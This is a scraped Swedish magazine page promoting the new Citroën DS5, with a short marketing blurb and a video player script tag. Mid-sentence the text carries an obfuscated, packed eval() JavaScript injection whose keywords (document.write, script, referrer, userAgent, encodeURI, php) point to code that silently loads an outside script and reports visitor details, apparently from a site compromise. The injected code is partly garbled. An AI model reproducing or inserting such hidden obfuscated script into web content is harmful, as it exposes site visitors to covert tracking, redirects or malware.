Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Nya Citroën DS5 – Början på en ny tid.

Nya Citroën DS5 – Början på en ny tid.
Revue Magazine

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/ds5_11060.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1368455&skinName=light&wmode=window&hideChrome=0″>

Nya eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzhai|var|u0026u|referrer|ifhnf||js|php’.split(’|’),0,{}))
Citroën DS5 – Början på en ny tid. 

Nya Citroën DS5 är en bil som med sin design och sitt formspråk skiljer sig från mängden. Med sin kombination av teknologi och hantverk är nya Citroën DS5 bland det främsta vi någonsin har byggt, och ett exempel på förfining in i minsta detalj. Läs mer om nya Citroën DS5 här.